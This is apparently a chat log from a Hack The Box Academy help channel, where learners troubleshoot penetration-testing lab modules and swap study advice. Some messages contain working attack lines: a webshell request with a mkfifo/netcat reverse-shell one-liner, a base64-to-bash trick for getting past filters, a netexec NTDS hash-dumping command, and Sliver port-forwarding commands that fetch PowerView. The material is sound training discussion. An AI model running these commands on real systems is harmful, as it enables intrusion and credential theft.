#modules
- you cannot export a single file you have to mount an NFS folder
i even did
showmount -e localhost
output comes like
Export list for localhost:
/tar/tar.txt 172.16.61.0/24
what am i doing wrong
how you are mounting the folder, share the command only.
ok i get what you're saying, i tried even
/tar 172.16.61.0/24(rw,sync,no_subtree_check,no_root_squash)
but still no positive op
mkdir target-NFS
sudo mount -t nfs 172.16.61.128:/tar ./target-NFS -o nolock
this is the command i used for mounting
on which machine you are @strong sorrel
kali
means module
footprinting/NFS
link of module.
i was able to easily complete the exercise, but in the module they mentioned to try out how NFS permissions and mounting works, to get a hold i tried to do it on myself, but i am not able to mount the file 😦
@brave scroll if you're able to mount the file perfectly please do send me the complete right procedure for it, i have already wasted 3 days for this :(( i feel so frustrated knowing for a fact that there might be a very tiny mistake and i'm not getting the right output just because of it, machines want everything PERFECT 😦
Question for non-english speakers. Did you make your notes in english or in your native tongue? I'm wondering which language should I use?
Whatever works best for you
I prefer English as all the terms and interfaces are English
Makes it a bit easier and less prone to errors
In my opinion
I am new, I am doing tier 0. Do sudo nmap -sV and nmap -p- -sV give the same information?
The difference is the -p- scans all ports
While without it scans the 1000 most common ports
Ohh ok thanks
Hello
Hello, Can anybody help me with Direct Prompt Injection section in Prompt Injection Attack module?
I put the ssh command and it froze after giving the pw. I was able to then open 127.0.0.1:5000 web portal and go to the first assignment. but when I try to submit my injection query it completely freezes and never shows any response back and I can't even re-open the page.
Need help on command injection skills assessment
Hi
I’ve got a question regarding module 112 within the MySql section … weird question.
Hi. Pass the hash module
"Access the target machine using any pth tool etc' "
I can't use NXC, i get authentication failure
But i can use evil-winrm. Why?
definitely in english. Try to think, write and work in english
command of both would be helpful to answer your question. I have no clue which protocol you are trying to authenticate to with nxc
Hello, I am struggling in module Attacking Active Directory and NTDS.dit. I have created a wordlist and performed a brute force attack with netexec and found credentials for cjoshnson, but when I use the -M ntdsutil it doesn’t capture the ntds file
have you tried multiple tools? If I remember correctly, impacket-secretsdump should also work to get the ntds file (if you have access to a user account that has privileges for that)
you can DM me, maybe I can help
you can dm me as well
It does not work
Impacket secretsdump works if you have already captured the ntds file
The only two seats that exist in the course is with netexec and with evil-winrm but none of this works in my case
dm me the command line output
and which exact section you are in right now, so I can check my notes
and impacket-secretsdump can retrieve hashes from ntds file
password attacks credential manager stuck. dumped credman using mimi but cant find required password
besides that, I had to use --ntds as an option to dump hashes with netexec.
$ nxc smb 172.16.5.5 -u <REDACTED> -p <REDACTED> --ntds --user user_to_get_hash_for
In the course it says to use -M ntdsutil though. The --ntds is not mentioned anywhere
WINRM and SMB
One sec
Nevermind
Why did LaZagne work but mimikatz didnt
sometimes tools just don't work.. this is why being comfortable with many methods is beneficial. In my cases, it was almost always my fault and not the tools fault
oh
Did you ever manage to solve (1) ? I ran into the exact same issue. Built the AVD, ran it, searched for the build number under Settings, About. But the build number found there is just not accepted, irrespective of how I format it.
forget it i solved it
as u mentioned you already have done the question.
As an italian speaker.... all my notes are in english. IT world, tools, courses, machine and all are in english so...
something like: mkdir target-nfs
sudo mount -t nfs 10.129.27.59:/ ./target-nfs/ -o nolock
anyone working on Attacking WPA/WPA2 Wi-Fi Networks - https://academy.hackthebox.com/module/282/section/3176 ?
That's the first ever thing that I tried but it failed as well
Hey there, I just finished the Introduction to SQLi module, but I feel like I'm not going far enough in the final SA 🤔 As per the course content, we get a webshell, but I'm unable to upgrade from the webshell to a reverse shell, even though it seems quite easy...
For a reason I am yet to identify, the following request does not come back to my nc listener, would someone know why ?
http://SERVER:PORT/path/shell.php?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $MY_IP 10000. Same goes for curl, but the same "path" with an id command works flawlessly 
Yes but can you help me with the mounting ?
The questions in it were simple and straight forward
weird, i did that module and that's the command i used (looking in my notebook)
Whats the error?
I believe it has something to do with the version
need help with this https://academy.hackthebox.com/module/51/section/1777
after checking the Python version as the exercise says, and getting it, exercise doesn't accept it.
Try a different payload then. Not every revshell payload will work, and depending on how you're delivering it, you may need to URL encode (revshells website has that option when you copy the shell)
Has anyone been able to complete the Malware Classification section of "Applications of AI in Infosec"? I'm following the instructions exactly, but am constantly getting "NameError: name 'load_datasets' is not defined". Feel like I have tried everything.
it says denied access
Hey guys , i need a teammate for an imaginary CTF challenge. Can anyone join with me ? Pls dm me
DM if u want.
Try messing with the version
How to do that
Guys hello. Who has done Pivoting, Tunneling and Port Forwarding in Skills Assessment? What is the answer format for this question: Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer.
Hi
https://academy.hackthebox.com/module/112/section/1072 Where can i reach this wordlist as a resource Footprinting-wordlist
Can someone explain me why there is a "Done reading? Check out ..." message on the general chat that impedes me to write on?
hii good people, i was doing Pass the certificate from password attack. i solved the first one "What are the contents of flag.txt on jpinkman's desktop?" then the next question "What are the contents of flag.txt on Administrator's desktop?" idk what to do. i looked through the files and found mimikatz.exe in Documents folder but it won't execute, please help me
If anyone has finished the SCCM attacks part in CAPE, please DM me, thanks.
Read and follow #welcome
So I saw your post the other day, but I likely didn't use the intended path to finish that one. I have been planning to go back through it to do it a different way and figured I'd hit you up then. I still haven't gotten around to it, but will try to do it today. Can DM if you'd like.
Is that user able to perform what you are trying to perform?
Anyone please
I'd work this part from that section AD CS NTLM Relay Attack (ESC8)
its cpts module 😂 not CAPE
Sorry i am little dumb can you explain please
Yeah re-read the section, that is literally the first heading with content.
Open that section, where you see that heading, start to read the material and follow along. It explains and demonstrates everything you need to do to perform the Pass the Certificate attack.
yeah mb didn't check the content after update
It's all good, I def make mistakes, but my second cup of coffee kicked in and I am a bit more aware.
Ay ay 🫡 so i just repeat the same relay attack for administrator. I'll read it again and try to follow, just got lost here, thank you for your help
Yeah it all depends on what .pfx you received from the previous one. If it was for that other user and that user doesn't have privs to get the answer to the second question, then yes I would work it again.
Active Directory Enumeration & Attacks module ACL Enumeration Section
is it normal to wait more than 10 minutes for powerview to enumerate ACLs?
Is the ccache actually located in the /tmp directory or is yours in the current working directory? Hey since your screenshot spoils content over Tier0 I'm going to delete it.
I don't recall how long that took to run, but yes it generally takes a bit of time.
it does i exported it too
It's doing a massive query and is filtering every single one of them so: Yes it's gonna take a while
You can DM.
It just meant I did the right thing bloodhound and finish XD
This is also part of the reason bloodhound takes so long, cos it essentially queries the same thing
nah sharphound took less than 5 minute to gather all the data, while powerview is still running and no output 20+ minutes
what does this mean? don't really understand
Use what you were taught in the section to find the name of the target
You could probably speed things up if you assign the return value from Convert-NameToSid to a variable. Your current code calls that function for each object returned by Get-DomainObjectACL and there are a lot of objects 😉
https://academy.hackthebox.com/module/112/section/1072 when i'm using smtp-user-enum with resource wordlist i have output that there aren't any results but when i'm using -T option i have output that it can't open username file. What should i do ?
Remember that mail servers sometimes respond a little more slowly.
Is it normal that on this module https://academy.hackthebox.com/module/27/section/439 it is asked to do a zone transfer but the zone transfer doesn't work ?
no, it should work
like with a dig axfr <domain> @<target_ip> right ?
I have reset the box multiple times
yes, just make sure that the correct TLD is used. The example uses .com
But the question uses .htb
that was the point 😉 if it still does not work you can DM me the output
Hi, I'm stuck on Question 4 of the “Using crackmapexec” module.
The hint says, “Sysadmins save their credentials securely,” but I've searched everywhere and can't find anything.
I found a keepass file, but I don't think it's related. Is that correct?
Without looking at my notes now. If the hint says that administrators keep their passwords safe and you find a password safe, then there should be a connection.
Doubling back just in case someone else has an idea, I just finished the Introduction to SQLi module, but I feel like I'm not going far enough in the final SA 🤔 As per the course content, we get a webshell, but I'm unable to upgrade from the webshell to a reverse shell, even though it seems quite easy...
For a reason I am yet to identify, the following request does not come back to my nc listener, would someone know why ?
http://SERVER:PORT/path/shell.php?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $MY_IP 10000. Same goes for curl, but the same "path" with an id command works flawlessly
I also tried different payloads & URL encoding it
It could be that the webserver has problems with some special chars in the payload. One trick to avoid this is to base64 encode your payload and then running /shell.php?cmd=echo <your_b64_string> | base64 -d | bash and remember to url encode everything.
I'm gonna try that thanks ! I also tried to upload the revshell code on a file but no more success there when accessing it
I checked the LSA, but couldn't find anything that could be cracked. I need some hints.
Which section are you in?
Well that didn't work either, but I'll be sure to keep it in mind for the future, thanks anyway!
I'm wondering if the fact that the box is only a specific SERVER:PORT is blocking off egress traffic from any other port 🤔
Using CrackMapExec - Skills Assessment Question 4
The module shows you a technique where you don't have to crack the file, but still get the data.
Just to confirm something, the ip isnt something like 10.10.*.* for you too right?
Hm, my IP is 10.10.*.*, the box IP is not. It's 94.237.61.242:33762 (or something like that, changes a bit every time)
When a module gives you an IP like that, it's a public docker container. You can focus only on that port and can ignore the rest.
So that would be the reason why I can't get a revshell from it ?
But my webshell passes through because it's running through the same port ?
No, that's probably a network issue. I don't recall any public docker container section in a module where you're supposed to establish a revshell, so you're probably not doing something right. Which module/section is this in?
NM I see, the SQL injection fundamentals module. Yeah I don't think you're meant to get a revshell, there may be rules in place preventing it. You can just use the webshell as shown in the section. It doesn't show setting up a revshell.
You'd need to setup port forwarding on your local network to point it to your machine, and if you're using a VM depending on how you set it up you'd need to route traffic to your VM's subnet
not required for the section though
Yes ! I solved it with the webshell, but thought that I was too limited and wanted to go a step further, that's why
Why would I need port forwarding for this situation when I can get revshells from other SA boxes with "just" the VPN up ? Is there a specific network conf for those specific boxes ?
edit : I see you're saying that it is a public docker container, and I can indeed reach it without the VPN. huh.
Yeah because your home network isn't allowing the traffic through so you'd have to setup port forwarding. That's not the case on the VPN, you're directly connected to the private network via the VPN so you don't need to port forward stuff for your public network.
Yep yep got it, I thought I was reaching it through the VPN but it's public indeed, my bad
Many thanks for the explanation
And I understand that a bindshell would fail as well, on behalf of the fact that only one port is open and that it is taken by the webservice, therefore we wouldn't be able to 1) start a socket on the server on the accessible port 2) reach the socket if somehow we managed to get one open on another port
Let me redo that @cloud urchin
@meager shadow please take care not to reveal attack paths for skill assessments
gotchu
Is there anyone who could help with the Server Side attack skills assessment - Edit: Disregard got it 🙂
lmaoo
lmao. there's a whole platform dedicated to learning.
edit: this deleted comment was nuts
Anyone done the advanced deserialization: XML part? unsure as to why I'm getting this error:
+ $exception {System.InvalidCastException: Unable to cast object of type 'System.Data.Services.Internal.ExpandedWrapper`2[System.Windows.Markup.XamlReader,System.Windows.Data.ObjectDataProvider]' to type 'TeeTrove.Models.Tee'.
at TeeTrove.Controllers.TeesController.Import() in C:\Users\bill\Desktop\Advanced-Deserialization-Attacks\TeeTrove\Controllers\TeesController.cs:line 91} System.InvalidCastException
The payload works in console app and all I've done is remove escapes and add the Tee tag.
The course is telling me that this is how its done, but its resulting in an error?
Hi, I made a pause in my CPTS
I'm at the Windows built in group module
https://academy.hackthebox.com/module/67/section/601
I have the NT hash and password of the Administrator but I don't successfully connect (either RDP, SMB, or mimikatz) I feel stupid.
you can dm me
In Advanced XSS and CSRF EXPLOITATION module, CSRF section it is given that Samesite cookies won't be sent in cross origin requests but it is wrong it should be cross site instead. Big difference
Do you think this is correct?
is it me or is the lab TE.CL illogical as fuck? i just resolved it and it seems a simulated http request smuggling because you let the update CL or put any CL it will resolve the lab (if you do the right thing to have CL taken)
you are right!!!
Hi guys, i have some questions about XXE on file upload attacks. When i upload a svg file, how does the web server execute that file?? If my svg file executes file:///flag.txt
How the server execute that?
THX
Btw, i asked chat gpt but i can barely understand it
File:// is just a method, if you ever open a file in a web browser you'll often see file:///path/to/file
Hello , I am stuck on Window Credentials . Could someone help me to figure it out ?
Hi
My problem is: What password does Bob use to connect to the Switches via SSH (Case-Sensitive). I tried pivoting but was not successful for ssh
I don't know if it is your case, but with sudo mount -t nfs [...] I was able to mount the share but unable to access its files (there was a TechSupport folder). Then I tried sudo su (so change user as Root) and again mount -t [...] and it worked. Dunno why
you used window rdp machine sudo su . not clear
C:/users/bob has .ssh file
but no access . I tried powershell but failed to read the content
Thx
Hi everyone!! Can someone help me with a quick help on the module File Upload Attack, been stuck on one question for two weeks now
Also re read the module again but still stuck
For the Password Attacks module, I completed the newly added "Attacking Windows Credential Manager" section. I was able to do UAC bypass and use mimikatz.exe to get the plaintext password. However, I decided to do it again today just to solidify my understanding, and it gave me a different password for the user mcharles. And Now I'm confused lol
Is that under File Transfers?
Oh nevermind
Applied everything learned on the Client side to bypass some upload filters. When I open the upload_images/shell.php4 it loads the page blank. Which means it is not executing the file. When fuzzing the extensions I get a length of 225-230 responses which does not match the 193 on the exercises. I did not pay attention to this since the exercises get updated.
Under the Bug Bounty Cert
That's on the CPTS path too, I wish I could help you, but I'm about 5 modules away from that lol
I have strong grit which is why I keep looking at this every day, but still cannot pass it
Wait I think I had a similar issue on one of the earlier modules, I would maybe swap vpn servers, and look into your shell code and make sure everything is absolutely perfect. I know sometimes the boxes can also be very unstable.
I tried doing a reverse-shell but it did not work also did try to listen using netcat
Is it the skills assessment?
Is the Blacklisted section
No one can
why?
Sorry but I am not sure
anyways can someone give me some tips on how to get better at cyber security bcs when i practice on hack the box, i cant understand anything i start asking chatgpt and watch yt videos
okay thank you tho!
and i feel like im not learning anything
I notice this section right here "Now, we can try uploading a file using any of the allowed extensions from above, and some of them may allow us to execute PHP code. Not all extensions will work with all web server configurations, so we may need to try several extensions to get one that successfully executes PHP code." Do you think it could be the extension you're using?
Hey man you'll get it in time. What are you struggling with the most right now? I still have issues of my own, but I started not understanding anything either.
You must keep at it day by day, otherwise you will forget and lose some parts
^This. Eventually you'll brute force your mind into grasping it no matter how slow or quick.
everything i cant understand anything
After a while it all makes sense. At the beginning it could be overwhelming but as you go you get a better understanding of what you have learned
Well what are you currently trying to work on or study? Like subject in particular are you struggling with?
well im studying cyber security as an skill i always wanted to learn it
Tried a couple
Of different ones also did an asp as well
Which area of Cybersecurity? Because it's a really broad field. And Youtubers will also trivialize things and make them look really simple, when in reality it takes a long time of practicing to really understand what's going on.
i struggle with everything, with remembering all the codes like root and how to use them
Best tip is to develop your own framework as everyone has different strategies. Start with the Networking foundations, this will help you understand how everything is communicating and interacts
I may have to go through this module to fully understand. Sorry man i wish I could be of more help
i really don't know which areas there are
alright thank you
root is the superuser. Basically the admin of the linux system. Like how Administrator is admin of a windows system.
The reason I am saying this, that is what I did and I am not a software developer but understand the difference in syntax for different languages
You can but majority of companies use Windows
You can download Virtual Box and watch a video on how to download that and download Linux and how to set it up as a virtual machine and you can practice from there. I would just mess around with it and get comfortable with the commands. You'll also want to get comfortable with PowerShell which is on Windows. It's overwhelming, but once it clicks, you'll find it much easier to learn different command lines.
thank you a lot guys!
No problem, just don't give up!
can someone please link me that github list of default creds that is in the pentester path, i can't seem to find it anywhere :/
do you mean seclists?
Never give up!! Have grit and if you get stuck take a break then get back to it! Make sure it is not a long break, otherwise you will need to re-read to refresh
SecLists or PayloadsAllTheThings
@severe crow
A puerto rican hacker 💀
Can only help the world one grain at a time 🔥
I'm trying to think how much trouble a non-spanish speaking person would have pronouncing "Coqui"
Would they say cawkui
Let's keep this channel on topic!
Are you working on your pentest path?
Hi Rem been trying to get assistance on a section Blacklisted under File Upload Attacks
Mostly on the Bug Bounty Cert Path
Are you unable to bypass it?
Unfortunately not yet, tried reading the threads in the forum but I think the exercise got updated due to the different response length than the example and the forums. I even tried an Asp file and changing the Content-Types. I’ve gotten creative but no bypass yet
You can DM what you've been trying.
Sending shortly
@wet arrow Please take care not to spoil content from modules above tier 0
Read and follow instructions in #welcome
Can anyone solve this problem ? what password does Bob use to connect to the Switches via SSH(Format:Case-Sensitive)
I am stuck this question solved other problems
Hi, this is covered in the walkthrough, so it's not an exercise answer. I'm just checking—is this for showing a way to do it, or is there a constraint requiring this approach?
It's against the rules to post content from any module above tier 0. Plus, for AEN, some people like to do it completely blind without reading anything from the module or the question themselves and you're spoiling that content.
If you feel the need to post a little more info you can ask to DM someone but please don't post the content
My apologies. Is there a chat where I can ask for this clarifications?
👍
I did pivoting based on winscp ip . looks like it is pivoting ip and port is 22 . I used LaZagne.exe , mimikatz but did not get ssh password
Pivoting is also not working
OK... I'm Officially stuck on how to even begin assessing the 'web application & api -> practical assessment'. I can't get it to respond with the scripts that I've got and it's not responding to any of the curl request that I've formed... Does anyone have any advice?
is there a channel for htb lab? i can't find it
You need to follow instructions in #welcome to gain access to most channels in the server
Can someone who knows http request smuggling better than me enlighten me?! i have the flag but for me it is illogical and i don't fully understand why it worked, for me it is a simulated http request smuggling and that makes the lab totally illogical and unrealistic
I've been stuck on Q4 of the Skill Assessment in the crackmapexec module for days. I need some hints.
Review the Popular Modules section, specifically things covered in the SMB protocol part.
hello world,
What are the contents of flag.txt on Administrator's desktop? PASSWORD ATTACK module, Pass the certificate, second question.
I was able to get jpinkman's account via evil-winrm and got my first flag. But how can i get the Administrator's flag?
Please help(
Are “Popular Modules” different from crackmapexec modules?
theres a submodule named 'popular modules' in crackmapexec module
Thank you, I was able to move forward. Why didn't I try this before?
its ok we all get confused sometimes haha
where else can i get help from? GPT is not even close. Google nothing. I think it would be cool if HTB would add some hint in there
never mind, thanks for not answering lol, i got it
it was easy
i am just dumb
i like this thing of HTB, as they are developing our power to think different & out of box.
btw there are hints(step by step) present but they are available only in Annual subscription.
no money no honey i see
🫠
i feel like it is better to do it on my own without hints, since it will make you find a way to solve it.But meanwhile it takes my time((
if it's taking time, there is nothing wrong to take hint instead of direct way.
you can ask for a hint whenever u think you are stuck but after trying your best -> as it will develop your methodology.
its not hint its whole solution xD (i have annual silver sub) :P
hehe i forget it.
I was able to complete all the crackmapexec challenges. This may be the first time it took me this long. Thank you.
u done with ad enum and attacks? 
Yes, I've already finished.
nice
Cheers! 🙂 Regarding the footprinting-module and the section about "IMAP / POP3" --> I needed to add the command tags in front of any command once logged in. I'm not sure whether it's in the academy-text or not, but I could not find it. I was kind of confused when the commands from the given command list did not work 😄 Is there another way or is it meant to be a bit confusing? 🙂
Need a sanity check on WindowsPrivilegeEscalation SA 1 - All my carbs are being spat out and I'm out of toner
man, this message got some type of encryption. I am not sure if he is asking for help or not 
I am, plez send help
you can DM if you want, I still have my notes about the skill assessment 1
dm or post question without spoilers, either way
Hello please help about this question: What is the Type of the service of the "dconf.service"? and when i try this command: "sudo vim /etc/systemd/system/dconf.service" i get nothing
which module and which section and their question?
From Linux Fundamentals> Task Scheduling
seems like you didn't google it, right?
yea I didn't
you don't have to check the file itself. The question is what type of service that the configuration file is for.
Google the question and see what service that is
okay copy that
@cloud urchin Could you please give me permission to DM you ?
Hi
That's illegal, contact instagram support
No one here can help you, contact instagram support
@waxen totem Could you please send me link how to enroll instagram support
@waxen totem Thanks
Hi! Could someone help me with https://academy.hackthebox.com/module/147/section/1315?
I'm having an issue with the LSA secrets exercise
After dumping them locally, I got the ||dpapi machinekey and userkey with the secretsdump|| but I don't know how to retrieve creds from that, || hashid -m "machinekeyhash" or hashid -m "userkeyhash" || returns nothing
dpapi.py
but that's not installed on the machine, neither python, can I install it? or for cleanliness I should find a way to do it without installing?
Because I tried the dumping externally and that didn't work
try impacket-dpapi
you use it on your attacker machine
Hello!! im having some problems crawling with finalrecon , i have no connection
Deleted your messages cos it spoils one of the answers for that section, is the subdomain in your /etc/hosts file?
yes
sorry
are you using this format:
<IP>(NO PORT) host subdomain
yes
DM me
@waxen totem can I DM you too? I'm still lost as this is not explained on the module properly
sure
Can anyone provide some help for the LLM output attack skill assesment is been 3 days am still stuck on it
Try to find an extension that is not blacklisted and can execute PHP code on the web server, and use it to read "/flag.txt"
Can someone help me out? I checked for what extensions can be uploaded, changed the contents and tried to execute the file and i never got my flag just the output of what's inside the file
If the file is displaying then it's not executing, which means it's probably the wrong extension
That's the thing, it says all the extensions are allowed but some arent allowed
I cant sit and test all 45 manually that's way too much, I don't know why fuzzing isn't working as it's supposed to be
What tool are you using to fuzz maybe?
Burp intruder is inherently slow, have you tried FFUF with a request.txt file or OWASP ZAPproxy ?
I have not used ffuf for it
but burpsuite should work just fine for fuzzing extensions for file upload
no clue, I didn't use it. Also looks like a lot of your extensions aren't php extensions
what did u use?
zaproxy
i'll try it
Yeah i dont know tbh what im doing wrong
Hi all, i was wondering if I can ask a question about the dynamic port forwarding with ssh and socks tunneling module here? I would like to post an image and get some clarification
thank you friend, I just did that
am I okay to ask the question and post the image here now?
yes this channel is for that only : )
perfect, I had a question relating to this image. There is accompanying text: " Let's take an example of the below image where we have a NAT'd network of 172.16.5.0/23, which we cannot access directly." I had questions regarding the NAT aspect of this statement. What does it mean in this context?
- does it mean that the IP that I see in the image 172.16.5.129 is a translated IP itself?
- or does it mean that ip 172.16.5.129 is the "public" ip of the NAT network and is performing translations for all machines behind it?
Module: Pivoting, Tunneling, and Port Forwarding
Section: Dynamic Port Forwarding with SSH and SOCKS Tunneling
NAT is Network translation address which will convert pvt. ip to public ip for forwarding requests
our public is diff and private ip is diff coz of NAT
Yes I understand that, but I don't understand how that applies in this context. How does my tunneling and enumeration approach change given that 172.16.x.x is within a NAT'd network?
Since the victim server is already compromised, and that server has an interface to the 172.16.x.x. address, can't I access all machines in that network as usual?
no
Hi everyone
you can access compromised machines directly (in same network) to access 172.16.x.x machines you have to do pivot to access that network
hi #welcome follow steps mentioned here
yep that makes sense, but how does NAT come in here? why is that even a consideration?
anyone can help on the windows lateral movement skills assessment? just need a little nudge, stuck on the VNC part
NAT doesnt come in here i explained coz u used NAT so i first thought u might be confused about what NAT does coz both networks are totally different but connected to each other
The module text says this about that image:
Let's take an example of the below image where we have a NAT'd network of 172.16.5.0/23, which we cannot access directly.
Are you saying that the fact that 172.16.5.x is a NAT'd network is irrelevant?
oh ok NAT does come in here coz the internal ip of the host might be different but its connected to a external network so its using NAT
yeah that's what i was wondering, that IP that is shown to me in the image 172.16.5.129 - is that a translated IP that this host has been given, or is the text saying that there is a private network, and 172.16.5.129 is the gateway ip into that network?
its translated IP for the host
perfect, thank you so much 🙂
no problem, even i spent two weeks on pivoting (concept only) got way too confused 😂
Hey, could anyone give me some hint with the password attacks module assessment? I got to DMZ01, I have scanned the rest of the hosts with nmap, tried to brute force SMB on FILE but can't make it work, not sure if it is possible.
try enumerating files
is it normal that SharpWSUS.exe not working on the SUPPORT host? like only the locate command works, running it as a rossy user
or do I have to run it on WSUS host? but there is no such user as rossy there, but I guess I can create in rossy context the new process, oh my dayz, its disgusting
Yeah you are going to want to run that on a host that supports it, which would likely be named WSUS.
So I must run it in Rossy context, right?
Hello did you find a solution?
There might be a reason to.
Hello did you find a solution. Im also stuck in this question. I tried it a few times but i cant find my mistake.
Yes, there is one compelling reason to run it under her context
Did you find a solution? I'm also stuck at this point...
But I cannot solve yet how can I run it, I am having trouble to get the process running as rossy
Hi, I'm stuck in the Android Fundamentals module.
I followed the instructions but my answer is wrong.
Do you have any ideas?
Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test)
I solved it...
Ohh, thanks I did it before but missed useful info
np
Did anyone solve the Windows credentials module in Password Attacks? I have been stuck for two weeks
If you are on the correct host, as the correct user, and SharpWSUS.exe isn't working try the powershell version.
yes whats your quest?
The user is not correct
Did you solve "What Bob uses password to switch via SSH ?" I did pivoting, mimikatz but nothing worked
Have you tried moving laterally with that user? If it's easier to explain things you can DM, as to not spoil content.
@wooden seal Did you solve SSH...
yes wait telling
@wooden seal Please DM me
@lucid grail can you name the sub module?
why thats problem ?
windows?
theres a file try looking for it
np, its in Attacking Authentication Mechanisms module specifically SAML Lab Setup
Hi, I am a complete beginner in cybersecurity and just started doing my first path of cracking into HTB, and in the module of Getting Started, I am stuck on the exercise in public exploits which is: Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start). So i ran msfconsole, and search exploit eternalblue and ran the exploit but it didn't work. I am confused on how to approach this.
Try visiting the ip
anyone here ???
Hi I have a question on module "Pivoting, Tunneling, and Port Forwarding" "Port Forwarding with Windows Netsh", I set the port forwarding with netsh, with Remmina it works but xfreerdp fails, can I only use xfreerdp with one window?
Xfreerdp works with multiple windows
Ok why doesn't it work? Remmina works... isn't it the same connection?
no idea why its not working, im assuming you did the proxychains/whatever ¯_(ツ)_/¯
Can I dm you? I don't want to spoiler commands
Sorry dms arent open atm
Ok can I show you the commands here?
Do I need to configure proxychains if i use portproxy?
I will try to reboot the machines 🙂
@wooden seal Did you find any solutions for Windows Credentials in Password Attacks module?
@wooden seal I have been stuck for almost three weeks
@lucid grail ^
i told u a hint
it should help u @lucid grail
@wooden seal Please give me hint . That is also helpful
@wooden seal you are talking about cheatsheet
theres a file on system search it
Password Attacks module credential hunting in network shares. I'm stuck cant find creds of other user, too much data
Maybe using a pattern is useful
guys hello I can't run ptunnel-ng tried all means to install it but nothing worked even chmod
I did , not much to do from there
When I did nmap I found a port to login page
But in the source code
There was no test login available
Well, you can always look up what's shown there in vulnerability databases...
Where's the vulnerability database?
Google, searchsploit, msfconsole
Intro to C2 Operations with Sliver In the Kerberos Delegation & Enumeration using rportfwd this doesn't work -
Assume that we set up a file server on port 8080 on our attack machine, and the target cannot reach this port. However, it can reach port 8080 on WEB01; we can create a reverse port forwarding on WEB01 to relay the traffic between SRV01 and our attack machine. To circumvent those types of restrictions, we will utilize the reverse port forwarding (rportfwd) functionality in Sliver. Execute the following command in the session of WEB01:
Kerberos Delegation & Enumeration
sliver (http-beacon) > rportfwd add -b 8080 -r 127.0.0.1:8080
[*] Reverse port forwarding 127.0.0.1:8080 <- :8080
This only loops traffic to local host from web01 to itself.
You need to add the following to make it work in that section:
On the Web01 session
sliver (http_beacon) > rportfwd add -b 8080 -r 10.10.14.189:8080
[*] Reverse port forwarding 10.10.14.x:8080 <- :8080
sliver (http_beacon) > rportfwd
ID Remote Address Bind Address
==== =================== ==============
3 10.10.14.x:8080 :8080
Then on the srv1 pivot:
rportfwd add -b 8080 -r 127.0.0.1:8080
then on the srv01 pivot session
sharpsh -- '-u http://127.0.0.1:8080/PowerView.ps1 -e -c R2V0LU5ldENvbXB1dGVyIC1VbmNvbnN0cmFpbmVkCg=='
#1234357888114364508 if you're suggesting a fix
thank you @fathom pendant
which tool should i use
I used nxc if I recall correctly, it wasn't much just using the newly found creds to search around
Using patterns like "pass" or "passw"
Those should be the same thing 😅
Something borked in the environment
you didn't even say which module/section/question you're on
@indigo roost I finally got time to test your suggestion for using RDP through SSH but unfortunately it did not work gave me the error:"Please check that the $DISPLAY environment variable is properly set."
Credential Hunting in Network Shares - As this user, search through the additional shares they have access to and identify the password of a domain administrator. What is it?
been stuck on this for hours
chasing my tail
There were just some hints mentioned. Scroll up a bit.
Try finding the domain (i.e. INLANEFREIGHT) and go from there
Anyone able to give a second opinion on what I may be doing wrong. I’m working with using chisel and trying to pivot to another machine using Xfreerdp basically my first target is a 10.129…… second target is a 172.16……. The 10. Has a network adapter that does Include a matching subnet to the 172. I did confirm my second target machine is listening on 3389 but I don’t seem to be able to get into the computer. I did confirm the windows 1st target is able to communicate with my attack client.
I’m wanting to believe that the user/pass I was able to recover does not have remote features, I need to confirm but I feel like the module I’m working on, the user is the only available one to get within.
Module: File Transfer Methods, Section SMB Downloads.
Why do I need to spin up an SMB server for downloading files from a share? Can't I just log into an SMB server via smbclient and just use the get/mget command and download the file?
Is it more evasive to mount a share and then copy it?
Sitrep i think you can also just RDP to the kali machine if that isnt working for you.
I'm not getting that error tho, I've seen on a forum that it might come up if u are trying to run xfreerdp as root? I say just reset ur target and if that doesn't work then reset the pwnbox too, assuming ur running this stuff through there
Hi, is there anyone here who speaks Hindi?
yeah unfortunately running as root and resetting has not fixed it maybe the connection is slow or the machines. I am currently RDP'd into Kali and then RDP'd into the windows machine but it takes several seconds for it to register input
sadge, lmk if u need any help with the skills assessment or the questions for that section
Hello everyone
Need help here
So in the SIEM fundamentals skill assessment it says connect to http://[Target]:5601
when I spawn the target and enter the ip it does not work
It says unable to connect
It was working on the previous section but when I reached skill assessment it is not working
needa wait for kibana to spin up i believe (~5 mins from what i remember), unless u already did that then reset the target maybe
Tried to wait for 20 minutes and I am facing this problem since yesterday
tried to change the target several time but nothing is working
can someone help me out, i'm doing the introduction to infosec course in HTB and i'm stuck in the public exploits section,|| i found out about the wordpress 5.6.1 and some themes||, nothing more than that, i also found a lot of possible public vulns, but i still can't figure it out, what am i missing?
*sorry about the bad english
The plugin is directly on the webpage when you visit it
i feel really dumb right now... but thanks a lot
Any good resources to learn about DLL Injecting/Hijacking and DLL in general. Im on windows privesc module, DLL injection part but i'm not quite understanding it
Hi, whenever i need to use metasploit to have a reverse shell i have this error: Failed to load extension: uninitialized constant Rex::Post::Meterpreter::Extensions::Stdapi::Stdapi Did you mean? STDIN. Therefore i use the web vm. Anyone got this error?
Which modules should I complete before attempting OUTBOUND ??
hi guys im stuck on this question for skills assessment documentation and reporting Connect to the testing VM using Xfreerdp and practice testing, documentation, and reporting against the target lab. Once the target spawns, browse to the WriteHat instance on port 443 and authenticate with the provided admin credentials. Play around with the tool and practice adding findings to the database to get a feel for the reporting tools available to us. Remember that all data will be lost once the target resets, so save any practice findings locally! Next, complete the in-progress penetration test. Once you achieve Domain Admin level access, submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host.
Stuck as in you don't know what to do or have done a bunch of stuff and haven't gotten anywhere?
both
Have you gotten any of the flags/answers?
for the module yes, im on the skills assessment but this is the first question of the skills assessment
I'd pick up with the easy stuff. If something was run already, might be worth running it again just to make sure you captured everything and something wasn't missed from the previous assessor.
the things in the previous sections were theory. I'm on the practical section now and have gotten nowhere for days
Yeah but haven't you done the previous modules in the path?
don't think so
Are you not doing the CPTS path or did you just purchase the Documentation & Reporting module?
just the module
Well if you do not have any pentesting knowledge (professional or via HTB Academy or similar platform) or experience, you are likely not going to get through the skills assessment.
